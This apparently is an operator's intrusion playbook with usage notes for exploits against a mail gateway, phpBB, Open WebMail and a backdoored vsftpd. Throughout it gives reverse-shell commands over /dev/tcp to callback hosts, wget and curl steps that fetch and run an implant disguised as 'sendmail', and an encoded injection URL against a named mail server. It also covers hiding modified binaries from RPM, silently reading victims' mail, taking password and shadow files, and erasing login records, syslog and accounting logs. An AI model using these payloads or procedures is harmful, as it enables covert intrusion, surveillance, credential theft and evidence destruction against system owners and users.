# The breakchroot program creates a directory "a.." while breaking chroot. Remem
ber to delete
# this directory as well!
# Now connect to the new noserver:
# (local)$ ./noclient 555.1.11.25:32755
# (remote)# id
# uid=0(root) gid=0(root) groups=0(root)
# (remote)# pwd
# /
#
# Make sure to delete all uploaded files/directories and reset directory permiss
ions!
#
# Troubleshooting:
# If EVENTSTART fails and says something like "No such file or directory" make s
ure all binaries
# have been statically compiled.
# If EVENTSTART fails and says something like "Permission denied" make sure all
binaries are set
# to mode 777. If not, use the setperms program (s).
#####################################################
# EMPTYBOWL
#####################################################
# vulnerability in MailCenter Gateway (mcgate) - an application that comes
# with Asia Info Message Center mailserver; buffer overflow allows a string
# passed to popen() call to be controlled by an attacker; arbitraty cmd execute
# known to work only for AIMC Version 2.9.5.1
# may get one shot only and then server will crash
# works on solaris 2.6-2.10
# test - fire115
# make sure not windows target running 3389 but unix target
# Usage: ./emptybowl.py <target-ip> <port> <cmd-string>
# --NOTE: All spaces in cmd-string will be replaced by \t's
# on redirector
-tunnel
l 3389 TARGET_ip
r LOW_PORT_1
r LOW_PORT_2
# local may be needed to elevate privileges
# DO NOT use the command below, since only have 1 shot at target
#./emptybowl.py 127.0.0.1 3389 'mkdir /tmp/.scsi ; cd /tmp/.scsi && telnet PITCH
_IP NETCAT_PORT < /dev/console | uudecode && uncompress sendmail.Z && chmod 700
sendmail && PATH=. D="-cPITCH_IP:NOPEN_PORT" sendmail;'
(sh</dev/tcp/PITCH_IP/RANDOM_HIGH_PORT1>&0 2>&0)
##### use this one
nc -l -vv -p 33333
./emptybowl.py 555.1.9.115 3389 "/usr/bin/ksh -c \"sh</dev/tcp/555.1.14.111/3333
3 >&0 2>&0\""
##### or this with doublet:
./emptybowl.py 555.1.9.115 3389 "/usr/bin/ksh -c \"cat < /dev/tcp/555.1.14.111/3
3333 | /bin/sh 2>&1 | cat > /dev/tcp/555.1.14.111/44444 2>& 1\""
# on redirector
netstat -an | grep LISTEN
# look for low ports to use for doublet that are not
# being used on the redirector (21,22,22,53,79,80,443...)
# substitute LOW_PORT_1, LOW_PORT_2 with ports decided
# from the above netstat command
doublet -O LOW_PORT_1 LOW_PORT_2
# change LOW_PORT_1, LOW_PORT_2, and PITCH_IP
./emptybowl.py 127.0.0.1 3389 "/bin/ksh -c \"cat < /dev/tcp/PITCH_IP/LOW_PORT_1
| /bin/sh 2>&1 | cat > /dev/tcp/PITCH_IP/LOW_PORT_2 2>& 1\""
#./emptybowl.py 127.0.0.1 3389 '(telnet PITCH_IP LOW_PORT_1 ; sleep 1) | /bin/sh
| telnet PITCH_IP LOW_PORT_2'
# in doublet window
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
w
pwd
id
cd /tmp
mkdir .scsi
cd .scsi
# locally
packrat RAND_PORT
<ctrl><c> # packrat command
gedit sendmail.Z.uu
# in doublet
pwd # make sure in /tmp/.scsi
/usr/bin/uudecode; ls -latr
copy/paste gedit contents into this window
ls -l
chmod 700 sendmail
PATH=. sendmail
# from redirector
-nstun TARGET_IP
# restart mcgate
<ctrl><d> doublet window on TARGET_IP
<ctrl><d>
# close tunnels on PITCH_IP
# start a new NOPEN with 'at' to avoid inheritance of listening socket
-cd /tmp/.scsi
echo "./sendmail" | at now
# from PITCH_IP
#burn this NOPEN to free up socket; from original NOPEN
# started (32754) on TARGET_IP
-burnBURN
# NOPEN 2:
# now restart mcgate in new NOPEN - use at again to prevent mcgate
# from being terminated on exit.
-cd /opt/aimc/setup
echo "./mcgate" | at now
-cd /tmp/.scsi
ps -ef | grep mcgate
# ELEVATE with extremeparr (dtappgather)
# after ELEVATE with extremeparr (dtappgather)
# and restarting noserver (sendmail), connect with
-rm sendmail
# burn nopen window on TARGET_IP with id of aimc
id
-burnBURN
#
# cleanup
-lt /opt/aimc/setup/
# remove core file
-rm /opt/aimc/setup/core
# in mcgate's directory; the following will be appended to mcgate.<date>:
Fri Feb 11 16:36:49 2005: cmdopen
--- : 0 : current cmd: uapi -u -f userPassword -e **************************
******************
Fri Feb 11 16:36:49 2005: cmdopen
--- : 0 : Result: rc= -5 len=0
-get /opt/aimc/setup/mcgate.YYYYMMDD
#locally
cp /current/down/../HOSTNAME.IP/opt/aimc/setup/mcgate.YYYYMMDD /current/up/m
# remove above entries; please leave the mcgate
# start values even the one we started. For example, leave:
Fri Apr 8 16:12:28 2005: main
--- : 0 : Current server port is 3389
vi /current/up/m
# on target
-put /current/up/m m
-ls -n /opt/aimc/setup/mcgate.YYYYMMDD
cat m > /opt/aimc/setup/mcgate.YYYYMMDD
-tail /opt/aimc/setup/mcgate.YYYYMMDD
# use -touch -t command from -ls -n output to
# reset timestamp on /opt/aimc/setup/mcgate.YYYYMMDD and
# /opt/aimc/setup. For example:
-touch -t 1112992709:1112992787 /opt/aimc/setup/mcgate.YYYYMMDD
-touch -t 1112992709:1112992787 /opt/aimc/setup
-rm m
at -l
-lt /var/spool/cron /var/spool/cron/atjobs
-touch /var/spool/cron/crontabs /var/spool/cron/atjobs
-cd ..
-rm .scsi
###### PORKED VSFTP Server #################################
# check to see if can use DIZZYTACHOMETER to remove mismatched vsftpd
rpm --version
whereis vsftpd
rpm -qf /usr/sbin/vsftpd
rpm -V vsftpd-1.1.3-8
-lt /usr/lib/librpm-4.1.so /usr/lib/librpmdb-4.1.so /usr/lib/librpmio-4.1.so /us
r/lib/libpopt.so /usr/lib/libbeecrypt.so /usr/lib/libbz
2.so
# or
2.so
-lt /usr/sbin/vsftpd
# normal vsftpd md5sum: 11111ecd2d3ab44015eae3592fcfaec7
# porked vsftpd md5sum: bde8b06829df05be8be4b5972a2d4a39
md5sum vsftpd
-put /current/up/it it
./it /usr/sbin/vsftpd
cp /usr/sbin/vsftpd ?
-put /current/up/vsftpd vsftpd
cp vsftpd /usr/sbin/vsftpd
# use itime results to reset vsftpd times to original settings
./it /usr/sbin/vsftpd
service vsftpd stop
service vsftpd start
######## Trigger porked vsftpd
### in local window, get nopen ready
packrat -z NETCAT_PORT
### on redirector, get nopen listener ready
-nrtun NOPEN_PORT
### on redirector, set up tunnel, use a "pork source port" from list below
-tunnel
l 21 TARGET_IP 21 SPORT
r NETCAT_PORT
### in scripted local window, send pork trigger
#Usage: ./client -t|-u timeadj sport hostname dport command
#sport: 3 51 3854 5671 8213 12634 16798 23247 35139 47923 53246 63201
#./client -t|-u [tcp/udp] timeadj sport [(valid source ports for the server are:
3, 51, 3854, 5671, 8213, 12634, 16798, 23247, 35139, 47923, 53246, 63201)] hos
tname[Host IP] dport [(port on which PORKified daemon is listening)] command"
./client -t 0 SPORT 127.0.0.1 21 "cd /tmp;mkdir -p .scsi && cd .scsi; cat < /dev
/tcp/PITCH_IP/NETCAT_PORT > sendmail.uu && uudecode sendmail.uu && chmod 755 sen
dmail && PATH=. S=1 D=\"-cPITCH_IP:NOPEN_PORT\" ./sendmail"
# use DIZZYTACHOMETER to hide package mismatches

############## DIZZYTACHOMETER #################
# Most Linux distributions contain a RPM database which stores information on in
stalled files. Thus, if a system file is
# modified, the rpm "Verify" command easily alert the sysadmin of the changed fi
le. DIZZYTACHOMETER alters a computer's
# RPM (4.1 or higher) database in order to hide a modified file. This is essent
ial when dropping down implants such
# as Jackladder and Pork.
# Works on Redhat 8 (rpm version 4.1), Redhat 9 (rpm version 4.2), and Mandrake
9.2 (verison 4.2)
rpm --version
./DizzyTach -p "packageName" [-f "filepath\file"] [-d] [-r] [-c] [-s] [-m] [-t]
[-q] [-V]
or
ARGS="-p "packageName" [-f "filepath\file"] [-d] [-r] [-c] [-s] [-m] [-t] [-q] [
-V] [-R]" ./DizzyTach
# library dependencies in /usr/lib:
#
# librpm-4.1.so
# librpmdb-4.1.so
# librpmio-4.1.so
# libpopt.so
# libbeecrypt.so
# libbz2.so
2.so
# or
2.so
example:
# Suppose we want to hide /usr/sbin/vsftpd frpm RPM
$ whereis vsftpd
vsftpd: /usr/sbin/vsftpd
# Find the rpm package that is responsible for this file.
$ rpm -qf /usr/sbin/vsftpd
vsftpd-1.1.3-8
# Run the rpm "Verify" command on the vsftpd-1.1.3-8 package.

rpm -V vsftpd-1.1.3-8
S.5....T /usr/sbin/vsftpd
# S, 5, and T were output. This means the vsftpd binary has a different size, m
d5, and modification time than the
# rpm database.
-put /current/up/DIZZYTACHSTATIC rpmStatic
# final command would be:
$ ./rpmStatic -p vsftpd-1.1.3-8 -f /usr/sbin/vsftpd -s -m -t -d -r -c
Reset: OK
SigRepair: NO
Lookup OK Sig Exists
Reset: OK
-d: OK
-m: UPDATED
-s: UPDATED
-t: UPDATED
Commit: OK Tested write of 8392 bytes
Performed write of 8392 bytes
Reset: OK
-r: OK
Commit: OK Tested write of 8392 bytes
Performed write of 8392 bytes
Reset: OK
# Check to see if the "vsftpd" is now hidden from rpm

$ rpm -V vsftpd-1.1.3-8
# This time, /usr/sbin/vsftpd is not output. Our modified file is now hidden fr
om RPM!
-rm rpmStatic
############################ ESMARKCONANT ##################################
# Exploits a vulnerability in the phpBB forum software.
# No authentication is required.
# target to be running phpBB less than version 2.0.11
# usage: ./xp_phpbb.pl -i<url> -t<valid topic_number> -c<commands to run
# on target>
# -i <http://127.0.0.1:80/forum/>
# -t <viewtopic.php?t=[topic_number]>
# -c <Command to run on target>
#./xp_phpbb.pl -i http://127.0.0.1:80/forum/ -t1 -c"uname -a;ls -la;w"
#./xp_phpbb.pl -i http://127.0.0.1:80/forum/ -t1 -c"(mkdir /tmp/.scsi; cd /tmp/.
scsi; /usr/bin/wget http://555.1.2.150:5555/sendmail -O
sendmail;chmod +x sendmail;D=-c555.1.2.150:9999 PATH=. sendmail) 2>/dev/null"
# 2 step troubleshooting
-tunnel
l 80 TARGET_IP
r NETCAT_PORT
nc 127.0.0.1 80
telnet 127.0.0.1 80
GET /phpBB2/ HTTP/1.0
# response should be:
# Powered by phpBB 2.0.4
# determine if viewtopic.php is vulnerable
./xp_phpbb.pl -i http://127.0.0.1:80/forum/ -t1 -c"uname -a;ls -la;w"
# response should have the output of the commands in the request:
# ...
# <br/>
cd /current/up
#locally to setup fowget to put rat on target since no uudecode
echo -e "HTTP/1.0 200\n" > new
cat new noserver > sendmail
nc -v -l -p NETCAT_PORT < sendmail
# on PITCH
-nrtun RAND_PORT
# upload and execute nopen
./xp_phpbb.pl -i http://127.0.0.1:80/forum/ -t1 -c"(mkdir /tmp/.scsi; cd /tmp/.s
csi; /usr/bin/wget http://PITCH_IP:NETCAT_PORT/sendmail
-Osendmail;chmod +x sendmail;D=-cPITCH_IP:RAND_PORT PATH=. sendmail) 2>/dev/nul
l"
# clean web access log
######### SNMPWALK
-tunnel
u 161 TARGET_IP
snmpwalk 127.0.0.1 -c COMMUNITY_STRING .system
#snmpwalk -v1 -c Ult1mate 127.0.0.1 .system
#snmpwalk -v2c -c Ult1mate 127.0.0.1 .system
#snmpwalk -v1 -c tenkap 127.0.0.1 enterprises.9.9.23.1
# Software info....
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson .system
# Hardware info .....
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson 47.1.1.1.1.2
# CDP neighbors
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson enterprises.9.9.23.1
# Flash Stuff
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson 16
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson enterprises.9.2.10.17.1.1
# Arp Cache
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress
# Route info
# not sure on this one what you want....
# gives 1500 lines on our jetson.net switches
snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson ip.ipRouteTable |wc
#####################################################
# EVOKEPROMPT
#####################################################
# In netscape/mozilla to get magic cookie:
# Tools->Cookie Manager->Manage Stored Cookies
# click on your cookie; take note of name and Information
# change name-sessionid and OWVSdif1.AMY to name and Information
# for the following command
# change callback IP
in /etc/hosts, add the dns target name to 127.0.0.1
1.EVOKEPROMPT Software Description:

- Exploits a vulnerability in a CGI against the Open WebMail system. The
request is parsed by the openwebmail-folder.pl CGI and is transferred to a perl
open call which allows
arbitrary command execution. Open WebMail runs on FreeBSD, Linux, Solaris,
and most Unix servers.
- The Open WebMail system runs as "nobody", therefore a local exploit is n
eeded if root access is required.
- Since it's a logic error, the same exploit will work on all versions of
Unix.
2.EVOKEPROMPT Usage:
# ./xp_downloadfolder
usage: ./xp_downloadfolder -i<host> -u<user> -a<user-sessionid> -b<session
number> -p<port> -c<commands to run on target>
-i <hostname|IP>
-p <default Port = 80>
-c <command to run on target>
-u <user>
-a <user-sessionid which appears in the cookie>
-b <session number which appears in the URL>
Examples:
1) ./xp_downloadfolder -i127.0.0.1 -ufuzz -a"OWNkEmsJpDdMg" -b0.0195130566
871775 -c"mkdir /tmp/.scsi; cd /tmp/.scsi; cat</dev/tcp/555.1.2.150/4444>sendmai
l;chmod +x
sendmail;sleep 60;PATH=. D=-c555.1.2.150:5555 sendmail"
871775 -c"PATH=/usr/bin w"
871775 -c"sh</dev/tcp/555.1.2.150/4444>&0 2>&0"
3.Target Susceptablility:
EVOKEPROMPT requires the target to be running Open WebMail 2.10 or higher.
4.On what will EVOKEPROMPT fail?
Will not work on older versions of Open WebMail. Versions that will not wo
rk include Open WebMail 1.80, 1.90, 2.00.
5.EVOKEPROMPT Additional Requirements:
Need username/password to authenticate.
Local exploit based upon the operating system. Could use DTAPPGATHER for S
olaris, rfork for FreeBSD, or ptrace for Linux.
6.Give troubleshooting instructions:
There are the steps in troubleshooting EVOKEPROMPT:
1. Determine if the webserver is running Open WebMail 2.10 or higher:
# galeon http://targetip/
2. Determine the OS based upon "User Preference/About" in the Open WebMail
system.
7.EVOKEPROMPT Example Usage:
1) <Open up a browser to the target address>
# galeon http://127.0.0.1/
2) Enter the UserID and Password. For the rest of this example, User
ID is name.
3) Set up Nopen to listen for a connection.
# noclient -l 123
or
# -nrtun 123
4) View the cookie for "Site" (in this case, 127.0.0.1) and "Cookie
Name" (in this case, name-
sessionid). The value
should be similar to this: OWVSdiyf1.AMY
5) Also, need to use the session ID in the URL, for example: session
id=name*-session-0.2724838
93045322
6) Send the exploit using xp_downdloadfolder with the above informat
ion:
# ./xp_downloadfolder -i127.0.0.1 -uname -a"OWNkEmsJpDdMg" -b0.0
195130566871775 -c"mkdir / tmp/.scsi; cd /tmp/.scsi; cat</dev/tcp/555.1.2.150/12
3>sendmail;chmod +x sendmail;sleep 60;PATH=. D=-c555.1.2.150:123 sendmail"
# this worked on faintspirit

./xp_downloadfolder -i127.0.0.1 -utonggl -a"OWKyenMN8jyV2" -b0.125111049580486 -
c"/usr/bin/wget http://203.234.72.4:443"
# others
./xp_downloadfolder -i127.0.0.1 -utonggl -a"OWXIer7nk2%2FpM" -b0.535692078600736
-c"(sh</dev/tcp/203.234.72.4/40151>&0 2>&0)"
c"sh</dev/tcp/203.234.72.4/40151>&0 2>&0"
c"/usr/bin/w; /bin/date"
c"mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/wget http://203.234.72.4:443/sendmai
l; chmod 700 sendmail; PATH=. D=-c203.234.72.4:46776 sendmail"
# abort the curl command, then modify the string to have the "ow-sessionkey-mail
.ihep.ac.cn-", https://127.0.0.1:443, and "=tonggl*mail.ihep.ac.cn-session-" inf
o included
# wget nopen (this worked):
curl --cookie "ow-sessionkey-mail.ihep.ac.cn-tonggl=OWKyenMN8jyV2" "https://127.
0.0.1:443/cgi-bin/openwebmail/openwebmail-folder.pl?sessionid=tonggl*mail.ihep.a
c.cn-session-0.125111049580486&folder=|(echo%20%27mkdir%20FtmpFEscsi%3B%20cd
%20FtmpFEscsi%3B%20FusrFbinFwget%20http%3AFF2G3E234E72E4%3A443Fsendmail%3B%20chm
od%207GG%20sendmail%3B%20PATH%3DE%20D%3D-c2G3E234E72E4%3A46776%20sendmail%27%7CP
ATH%3D%60printf%20%27%5C057usr%5C057bin%27%60%20tr%20E-G%20.-0%7CPATH%3D%60print
f%20%27%5C057bin%27%60%20sh)&action=downloadfolder"
### In a local scripted window, set up a netcat to listen for a connection:

nc -vv -l -p NETCAT_PORT
### try connecting via netcat after any "session failed" message when redirectin
g:
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
w
uname -a
### start a netcat with the right nopen version (don't need to uuencode with /de
v/tcp way)
### nc -l -p NETCAT_PORT < sendmail
pwd
ls -l /usr/bin/uudecode
/bin/cat</dev/tcp/203.234.72.4/39588>/tmp/.scsi/sendmail
chmod 700 sendmail
PATH=. sendmail
id
grep -v "203.234.72.4" /home/ihep/tonggl/.openwebmail

-gs grepout -d -w /tmp/.scsi "203.234.72.4" /home/ihep/tonggl/.openwebmail/histo
ry.log
-gs grepout -d -w /tmp/.scsi "203.234.72.4" /home/ihep/chep2001/.openwebmail/his
tory.log
-gs grepout -d -w /tmp/.scsi "203.234.72.4" /var/log/openwebmail.log
grep -v "203.234.72.4" /var/log/openwebmail.log> o; cat o > /var/log/openwebmail
.log
7) Check the following logs and directories:

/home/name/.openwebmail/history.log
/var/log/openwebmail.log
/home/name/mail
/home/name
/var/www/cgi-bin/openwebmail/etc/sessions/
#####################################################
# POPPING MAIL FROM A TARGET
#####################################################
### You'll be listing the messages from within a scripted window
### You'll need to devise a way to separate the mail for multiple users (for tuc
kering)
### if you are accessing more than one account
### You might try using a separate scripted window for each user, then copyi
ng
### the scripted window to the name of the user for post-processing
### The session timeout is fairly short so have your commands ready to paste
### You have to "guess" where the newest mail is, so you might want to start
### backwards to get the most recent mail, IF that applies and the mail is
### sorted by date
### IMPORTANT!!!!!! DO NOT "QUIT" THE SESSION!!!! LET IT TIMEOUT,
### OR CLOSE THE TUNNEL TO HAVE IT DROP THE CONNECTION.
### You do not want the mail marked as "read" or anything else.
### set up tunnels on redirector:
-tunnel
l 110 TARGET_IP
### in a local scripted window:

telnet 127.0.0.1 110
USER <USERNAME>
PASS <PASSWD>
LIST
RETR 1
RETR 2
RETR 3
RETR 4
RETR 5
RETR 6
RETR 7
RETR 8
RETR 9
RETR 10
...
...
...
### If the session hasn't timed out, close the tunnel channel to move on to the
### next user or to end the op
#############################################################################
############ I AM ROOT!
#############################################################################
###path with NO Working directory for atjob
#-setenv PATH=:/usr/bsd:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc
-setenv PATH=/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin
HISTFILE="" ksh
# or
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
-ls
-rm sendmail sendmail.uu
# Look for and clean (if necessary) logs
###### FORENSICS ##############
=info
df -k
-find <directory1> <directory2>
-gs survey
-ls /var/spool/cron/crontab
-strings /platform
## /platform/SUNW,SystemEngine
### See who's on, note uptime and load; verify time/timezone; see who's been on
w; date; last -80
### Change owner/group/modes...if in doubt, see what's already in "/tmp"...
-ls -t / /tmp
### core files?
-ls /core
### Root users:
-ls /var/adm/sulog
-vget /var/adm/sulog
### owner:group should be root:sys...
chown -R root:sys /tmp/.scsi; chmod -R og-rwx /tmp/.scsi; ls -al
### Baseline swap
/sbin/ps -elf; swap -l; uptime
### Enough space to upload tools? Any partitions about to fill up?
df -k
################ OTHER CLEANING ################

#################################
### TOAST the login entries.....
#################################
### Target window
-put ../up/toast t
### TO VIEW...
./t -l /var/adm/lastlog | tail
### TO ZAP...
./t -u /var/adm/utmp tty date
./t -u /var/adm/wtmp tty date
./t -x /var/adm/utmpx tty date
./t -x /var/adm/wtmpx tty date
./t -l /var/adm/lastlog /var/adm/wtmp[x] user
#################################
### SGREP messages
#################################
-put ../up/sgrep s
### To look first:
./s "unique string" /var/adm/messages
### To replace with a string of equal or shorter length
./s "unique string" "replacement string" /var/adm/messages
#################################
### SGREPSUB (numerous things to grep)
#################################
usage: sgrepsub -i /tmp/messages -r /tmp/rand -c 31

-i <infile: lines to be replaced by sgrep>
-r <replacement file: substitution lines>
-c <column to start replacing: use vi <ctl g> to find the column number>
-h <help>
-f <filename string: default = /var/log/messages>
-s <sgrep alias: default = ./s>
ex: sgrepsub -i /tmp/messages -r /tmp/rand -c 31 -f /var/log/messages
### Locally, create a file containing the lines you want to change from /var/adm
/messages
cd /current/down
vi sg.input
### Locally, create a 2nd file containing one or more lines of replacement strin
gs
cd /current/down
vi sg.repl
### Locally, run
sgrepsub -i sg.input -r sg.repl -c <COL_NUM> -f /var/adm/messages -s ./s
### Verify the output, then paste the generated commands in the target window
#################################
### PCLEAN (put up right one)
#################################
-put ../up/pcleanTAB sendmail
-ls
### make sure to exit all but one window (processes log upon completion)
### Pclean usage:

### -e: look for null entries
### -i: calc number of entries in file
### -r: looks for entries with gid=root
### -t: search this time range
### -l: search for last X hours
### -S: ignore matches in the following string?
### Usage:
./pclean [-h(elp)] [-d] [selection_option(s)] [filename]
-d: DELETE selected entries
Selection options: (Two or more selection options are ANDed together)

--------------------------------------------------------------------
no options: print all entries to stdout and exit
-h(elp): self expl
-e: list null entries; all other select criteria ignored
-f fname: delete whitespace-separated numeric entries
listed in "fname"
(numbers must be in numeric order -- try the
"sort -n" option if necessary)
-r: list entries w/ gid == root
-i calculate # of entries in the file
(all other selection options ignored)
-l num_hrs list entries whose start time was within last num_hrs hours
-n numeric_list: select numeric ranges and/or individual entries
(numeric list CANNOT have spaces and MUST be
in numeric order and comma-separated)
e.g.: -n 1-1024,1080,6666,31337
** NOTE: USING EITHER THE -n OR -L OPTION CAN
** SIGNIFICANTLY IMPROVE PROCESSING TIME
-L number: select the last number of entries
** NOTE: USING EITHER THE -n OR -L OPTION CAN
** SIGNIFICANTLY IMPROVE PROCESSING TIME
-k numeric_list: slower version of -n (doesn't use lseek)
-t time_range: entries that fall within time range, specifed
as [[CC]YY]MMDDhhmm[.SS]-[[CC]YY]MMDDhhmm[.SS]
(no spaces)
e.g. 8 Jul 1999 from 10am to 11am:
-t 199907081000-199907081100
-c cmd_name: strncmp() search for 1st 8 chars of commands that
match cmd_name
-s "cmd1|cmd2|...": strncmp() search for 1st 8 chars
of commands that DO match a list of '|'
separated strings (kinda like egrep)
-S "cmd1|cmd2|...": strncmp() search for 1st 8 chars
of commands that DON'T match a list of '|'
separated strings (kinda like egrep -v)
### LOCALLY, make pclean dir

-lsh mkdir /current/down/pclean
### Make sure your path is correct:
### redo path with WORKINGDIR
-addpath .
### or equivalently:
### DEC:
#-setenv PATH=/usr/.advtags:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc:/usr/ucb
### OTHER:
#-setenv PATH=/tmp/WORK_DIR:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc:/usr/ucb
### newer way

#### Checks number of processes in file? Informational
#### This one doesn't do any cleaning yet.
sendmail -i; date
### This works for ICESKATE (DEC)
#sendmail -r -l 4 -S "sendmail|imapd|idled|mail.lo|popper|sshd|in.ident|syslogd|
telnetd|ipop3d|imapd" > T:/current/down/pclean/o
## safest way for SPARC
sendmail -l 4 > T:/current/down/pclean/o
### Locally, edit file and remove any excess entries
### Use following on local host to convert into input format:
cp o o.orig
### Delete header and footer lines, along with any processes that
### don't appear to be us
vi o
### Convert the file into input format (process ref numbers only): OR in vi: :
%s/ .*//g
cut -f1 -d ' ' o > i
# or
cut -f1 -d ' ' o.grep > i
### Verify the file to be uploaded is correct:
cat i
### upload input file
-put /current/down/pclean/i i
-ls
### DON'T RUN ANY MORE NON-BUILTIN COMMANDS ON TARGET AFTER THIS COMMAND!!!!!
### Delete our entries
sendmail -d -f i > T:/current/down/pclean/o.after
### Locally, edit file and remove any excess entries
### verify pclean worked:
cat o.after
### Paste the final 'sendmail' cleanup line from o.after on the target
### until it says "no entried selected"
### Extra cleanup
### reset timestamp on /usr after rm /usr/.advtags
-rm sendmail i
### DO NOT RUN ANY MORE NON-BUILTIN COMMANDS or you'll HAVE TO PCLEAN AGAIN!!!!
################################################################################
######
### check logs

#grep 217.53.1.2 /var/adm/SYSLOG /var/log/syslog
grep PITCH_IP /var/adm/SYSLOG /var/log/syslog /var/adm/messages
### Get a reboot history through a combination of the following:
### Take note if anyone was on the console around the time of any reboots
last | egrep "down|boot|console"
last -15 boot
-tail /var/adm/sulog
#### CHECK FOR ACCOUNTING...
-ls /var/adm/*acct
-ls -t /var/spool/cron/crontabs
grep acct /var/spool/cron/crontabs/*
-ls /var/spool/cron/atjobs
grep acct /var/spool/cron/atjobs/*
#### (1) What's the current local time?
### (2) Is the platform close to what we thought?
### (3) Do we have some available disk space?
### (4) Are there currently any at jobs?
date; uname -a; df -k; at -l
### check for remote monitoring
#-ls -t /var/adm/syslog.dated
#-ls -t /var/adm/syslog.dated/current/
#-tail -70 /var/adm/syslog.dated/current/auth.log
#-tail -70 /var/adm/syslog.dated/current/daemon.log
#-tail -70 /var/adm/syslog.dated/current/mail.log
#-tail -70 /var/adm/syslog.dated/current/others.log
#egrep "PITCH_IP|inetd| ident" /var/adm/syslog.dated/current/*.log
### check other logs
-ls -t /var/adm
-ls -t /var/log
####### LINUX VALIDATOR TECH CHECKS:

hostname
=mkoffset
-ifconfig
### Looking for libint.so in maps:
-ls /proc/1/
cat /proc/1/maps
### check access times:
-lt /lib/libinit.so
-ls -u /lib/libinit.so
### should NOT exist:
-lt /etc/ld.so.preload
### see if lock file is there, pull if not too big:

-lt /var/spool/lpd/_default
-get /var/spool/lpd/_default/<lockname>
### check reboots:

-ls -t /var/log/*ksym*
### check logs around time of last callback:
-ls -t /var/log/mess*
-get /var/log/mess*
### pull this (should compress well):
-lt /var/log/lastlog
-get /var/log/lastlog
-ls -t /root
-get -v /root/.bash_history
############# For LINUX

-ls /var/spool/cron
-ls /var/run/utmp
-ls /var/log/wtmp
netstat -an
netstat -anlp
###### shows dates of reboots:
-lt /var/log/ksyms*
### Like uname -a
-cat /etc/*release
uname -a
### Like psrinfo -v:
cat /proc/cpuinfo
# Kernel info - vmlinux
stat /dev
stat /sbin/init
-lt /boot
-get /boot/System.map*
-lt /etc
-get /etc/lilo.conf
mount
-ls /sbin/init
cksum /sbin/init
lsmod
-ls /sbin
ls -l /proc/1/exe
-ifconfig
netstat -npa
# For SS
/proc/config.gz
/boot/config-ùname -r`
/proc/version
/usr/src/linux-ùname -r`/.config
/usr/src/linux-ùname -r`/configs/*.config
# For JL
rpm -qa |grep xinet
-strings /usr/sbin/xinetd |grep Version
-get /usr/sbin/xinetd
-ls /etc/xinetd.conf
grep "disable" /etc/xinetd.d/*
chkconfig --list
######## END FORENSICS ##########################

############- Create our slash and burn at job
cd /; echo "rm -rf /tmp/.scsi > /dev/null 2>&1" | at now + 180 minutes
cd /; echo "kill -9 ###FINSPID### > /dev/null 2>&1" | at now + 180 minutes
at -l; date
### vi commands to (1) mark, (2) modify file for at job, (3) jump back here
mx
:%s/at -r ### /at -r /g
`x
-setenv PATH=/tmp/.scsi:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc:/usr/ucb
### What protocols are serviced by 'inetd'...
grep -v "^#" /etc/inetd.conf
### Which facilities and levels are getting logged to which files/hosts...
grep -v "^#" /etc/syslog.conf
### Named config files
-ls /etc/named*
-ls /var/named*
### ASET (Automated Security Enhancement Tool) CHECK...

###
### After connecting and creating/cd-ing to your "working
### directory" in /tmp
grep aset /var/spool/cron/crontabs/*
### if aset if running, look for path after the "-d" option
### i.e. 0 0 * * * /usr/aset/aset -d /usr/aset
### /usr/aset would be the path we're looking for
### if this path is _not_ /usr/aset, run the following commands
### as is AND a second time replacing /usr/aset with the path
### from the cron job
#ls -al /usr/aset
#ls -al /usr/aset/reports/latest
### ASET Tasks...
#ls -al /usr/aset/tasks
#tar cvf as.t /usr/aset/tasks; ls -la
#### ASET Archives...
#ls -al /usr/aset/archives
#tar cvf as.a /usr/aset/archives; ls -la
#### ASET Master Files...
#ls -al /usr/aset/masters
#tar cvf as.m /usr/aset/masters; ls -la
#### Download any ASET tar files and remove from tmp dir on target
################ Locally, look thru find ################################

#### Typical grep's on downloaded 'find' file
#### Do on local host after downloading files. Collectively...
cd /current
egrep '(tftpboot|cisco|router|hack|\.\.\.|tacac|ssh)' *m
## or, singly...
grep cgi-bin *m
grep tftpboot *m
grep cisco *m
grep router *m
grep hack *m
grep "\.\.\." *m
grep ssh *m
grep tac *m |egrep '(passwd|pwfile|etc|wtmp|conf|plus)'
#### Since we're looking at 'find', TRIPWIRE could be elsewhere, too...
#### Collectively...
egrep '(trip|twz|tw\.config)' *m
# or, singly...
grep trip *m
grep twz *m
grep "tw\.config" *m
### look for history files
grep history *m
### Extra -local window

#lsstamp -c 2 -s sorts based on atime (good for finding config files)
#lsstamp -c 3 -s sorts based on ctime (good for finding hacker activity)
# OR
# ./mkfinds -h
# ./mkfinds
################################################################################
###
################################################################################
###
### PASSWD FILE?
# get -l option will disconnect absolute path locally
-ls /etc/passwd /etc/shadow
-get -l /etc/passwd /etc/shadow
############# MAILGRAB ##############################
# Strifeworld Collection
-setenv PATH=/tmp/.scsi:/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin
who -b
######################################################
# SUCTIONCHAR
######################################################
# 32 or 64 bit OS - solaris sparc 8,9
# Kernel level implant - transparent, sustained, or realtime
# interception of procoess input/output vnode traffic.
# retrieve later
# filter: ssh, telnet, rlogin, rsh, password, login, csh , su
# max bytes collected per session is 32 kilobytes
# max bytes collected for all sessions is 1 megabyte
# don't take up more than 1% of system's memory
# to determine if suctionchar is loaded on a system is to
# open a command channel to the implant as described in
# authenticate and yyserv tool and demo sections. If this
# fails and receives the error "Bad Address" when trying to
# modload the instant grat module; function call needs patch
# can't be found, probably because already been patched by a
# version of suctionchar already running
# SUCTIONCHAR will go away at reboot
# if offset involved with target, must set op box time to match target time
# INSTALLING SUCTIONCHAR
uname -a
isainfo -v
